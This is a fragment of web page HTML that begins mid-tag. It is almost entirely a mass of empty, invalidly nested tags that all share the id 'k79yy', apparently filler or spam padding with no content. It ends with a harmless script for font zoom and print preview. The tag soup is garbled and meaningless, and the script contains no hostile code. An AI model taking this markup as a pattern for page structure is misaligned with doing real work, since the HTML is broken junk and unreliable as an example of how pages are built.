id='k79yy'><sup id='k79yy'></sup><form id='k79yy'></form></kbd></select><big id='k79yy'></big><em id='k79yy'></em><sup id='k79yy'><b id='k79yy'></b><strong id='k79yy'></strong></sup><kbd id='k79yy'><ol id='k79yy'></ol></kbd><optgroup id='k79yy'><tt id='k79yy'><font id='k79yy'><td id='k79yy'></td></font></tt></optgroup><pre id='k79yy'><center id='k79yy'></center></pre><tt id='k79yy'></tt><big id='k79yy'><strike id='k79yy'><li id='k79yy'><kbd id='k79yy'></kbd></li><i id='k79yy'><blockquote id='k79yy'><label id='k79yy'><u id='k79yy'><ins id='k79yy'></ins><dfn id='k79yy'></dfn></u></label><noscript id='k79yy'><span id='k79yy'></span></noscript><td id='k79yy'></td><pre id='k79yy'><li id='k79yy'><td id='k79yy'><label id='k79yy'></label><pre id='k79yy'></pre></td></li></pre><small id='k79yy'></small></blockquote></i><b id='k79yy'><i id='k79yy'></i></b><td id='k79yy'><select id='k79yy'></select><table id='k79yy'><tbody id='k79yy'></tbody></table><dt id='k79yy'><dd id='k79yy'></dd></dt></td></strike><strong id='k79yy'><sub id='k79yy'></sub><td id='k79yy'></td></strong></big><blockquote id='k79yy'></blockquote><small id='k79yy'></small><dir id='k79yy'></dir><tr id='k79yy'></tr><center id='k79yy'><u id='k79yy'></u></center><kbd id='k79yy'></kbd><select id='k79yy'><u id='k79yy'><p id='k79yy'><p id='k79yy'><em id='k79yy'><dfn id='k79yy'><table id='k79yy'><dl id='k79yy'></dl><center id='k79yy'></center></table></dfn><div id='k79yy'></div><small id='k79yy'></small></em></p></p><acronym id='k79yy'></acronym><u id='k79yy'></u><sup id='k79yy'><thead id='k79yy'><noscript id='k79yy'></noscript></thead></sup></u><ol id='k79yy'></ol><sub id='k79yy'></sub></select><address id='k79yy'></address><dl id='k79yy'><small id='k79yy'><ul id='k79yy'><optgroup id='k79yy'><em id='k79yy'></em></optgroup><tt id='k79yy'></tt><strike id='k79yy'></strike></ul><thead id='k79yy'><kbd id='k79yy'><kbd id='k79yy'></kbd><noframes id='k79yy'><bdo id='k79yy'><sup id='k79yy'><div id='k79yy'><bdo id='k79yy'></bdo></div></sup></bdo></noframes><label id='k79yy'></label><strike id='k79yy'></strike></kbd></thead></small></dl><big id='k79yy'></big><ins id='k79yy'><optgroup id='k79yy'></optgroup></ins><dl id='k79yy'><tbody id='k79yy'></tbody></dl><dt id='k79yy'></dt><tr id='k79yy'><address id='k79yy'></address></tr><small id='k79yy'><font id='k79yy'></font></small><option id='k79yy'><thead id='k79yy'></thead><em id='k79yy'></em></option><tfoot id='k79yy'></tfoot><tbody id='k79yy'></tbody><li id='k79yy'></li><tbody id='k79yy'></tbody><address id='k79yy'></address><del id='k79yy'><big id='k79yy'><label id='k79yy'><code id='k79yy'><th id='k79yy'><legend id='k79yy'></legend><i id='k79yy'></i><form id='k79yy'></form></th></code></label></big><dd id='k79yy'><span id='k79yy'><abbr id='k79yy'></abbr></span></dd></del><ol id='k79yy'></ol><address id='k79yy'><sup id='k79yy'><acronym id='k79yy'></acronym></sup></address><blockquote id='k79yy'></blockquote><font id='k79yy'></font><optgroup id='k79yy'><bdo id='k79yy'></bdo><acronym id='k79yy'></acronym></optgroup><del id='k79yy'></del><code id='k79yy'><select id='k79yy'></select><td id='k79yy'></td></code><tfoot id='k79yy'></tfoot><kbd id='k79yy'><b id='k79yy'><style id='k79yy'><tbody id='k79yy'><tr id='k79yy'></tr><big id='k79yy'></big><ol id='k79yy'><u id='k79yy'><dfn id='k79yy'></dfn></u></ol></tbody></style><dl id='k79yy'><b id='k79yy'><ins id='k79yy'><tt id='k79yy'><b id='k79yy'><blockquote id='k79yy'><dir id='k79yy'></dir><label id='k79yy'><li id='k79yy'></li><i id='k79yy'></i><u id='k79yy'><tbody id='k79yy'></tbody></u></label><li id='k79yy'><tt id='k79yy'></tt></li></blockquote></b></tt></ins></b></dl></b></kbd><fieldset id='k79yy'><sub id='k79yy'><div id='k79yy'></div></sub></fieldset><acronym id='k79yy'><td id='k79yy'><form id='k79yy'></form></td><big id='k79yy'><dfn id='k79yy'><b id='k79yy'><address id='k79yy'></address></b><thead id='k79yy'><span id='k79yy'></span></thead></dfn></big></acronym><ul id='k79yy'></ul><tbody id='k79yy'><sup id='k79yy'><legend id='k79yy'><b id='k79yy'></b></legend></sup><legend id='k79yy'><sub id='k79yy'><ul id='k79yy'><b id='k79yy'><q id='k79yy'></q></b></ul><tfoot id='k79yy'></tfoot><ul id='k79yy'></ul><bdo id='k79yy'></bdo></sub></legend></tbody><dfn id='k79yy'><label id='k79yy'></label></dfn><em id='k79yy'><bdo id='k79yy'><ins id='k79yy'><dl id='k79yy'></dl></ins><pre id='k79yy'><p id='k79yy'></p><span id='k79yy'><tt id='k79yy'></tt></span></pre></bdo></em></div></html> <script> function fontZoom(size) { document.getElementById('fontzoom').style.fontSize=size+'px'; } function preview() { bdhtml=window.document.body.innerHTML; sprnstr="<!--startprint-->"; eprnstr="<!--endprint-->"; prnhtml=bdhtml.substr(bdhtml.indexOf(sprnstr)+17); prnhtml=prnhtml.substring(0,prnhtml.indexOf(eprnstr)); window.document.body.innerHTML=prnhtml; window.print(); window.document.body.innerHTML=bdhtml; } </script>